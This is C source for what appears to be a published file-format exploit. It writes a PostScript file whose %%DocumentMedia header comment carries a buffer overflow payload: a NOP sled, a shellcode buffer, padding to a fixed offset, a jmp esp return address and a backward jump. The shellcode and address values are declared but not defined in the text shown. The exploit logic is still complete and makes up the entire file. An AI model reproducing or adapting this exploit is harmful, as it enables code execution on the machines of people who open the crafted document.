
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int FILE ;


 char* cb ;
 int errno ;
 int exit (int) ;
 int * fopen (char*,char*) ;
 int fputc (char,int *) ;
 int fputs (char*,int *) ;
 int fwrite (char*,int,int,int *) ;
 char* jmpesp ;
 int printf (char*,char*,...) ;
 char* strerror (int ) ;
 int strlen (char*) ;

int main (int argc, char **argv) {
 FILE *fh;

 if (!(fh = fopen(*(argv+1), "w+b"))) {
  printf("%s <file.ps>\n\n", *(argv));
  printf("[-] unable to open file '%s' for writing: %s\n", *(argv+1), strerror(errno));
  exit(1);
 }

 fputs("%!PS-Adobe-3.0\n", fh);
 fputs("%%Title: hello.ps\n", fh);
 fputs("%%For: K-sPecial (xzziroz.net) of .aware (awarenetwork.org)\n", fh);
 fputs("%%BoundingBox: 24 24 588 768\n", fh);
 fputs("%%DocumentMedia: ", fh);
 for (int i = 0; i < 100; i++)
  fputc(0x90, fh);

 fwrite(cb, strlen(cb), 1, fh);

 for (int i = strlen(cb) + 100; i < 273; i++)
  fputc('A', fh);

 fwrite(jmpesp, 4, 1, fh);
 fwrite("\xe9\x02\xff\xff\xff", 5, 1, fh);

 fputc('\n', fh);

 fputs("%%DocumentData: Clean7Bit\n", fh);
 fputs("%%Orientation: Landscape\n", fh);
 fputs("%%Pages: 1\n", fh);
 fputs("%%PageOrder: Ascend\n", fh);
 fputs("%%+ encoding ISO-8859-1Encoding\n", fh);
 fputs("%%EndComments\n", fh);

 return(0);
}
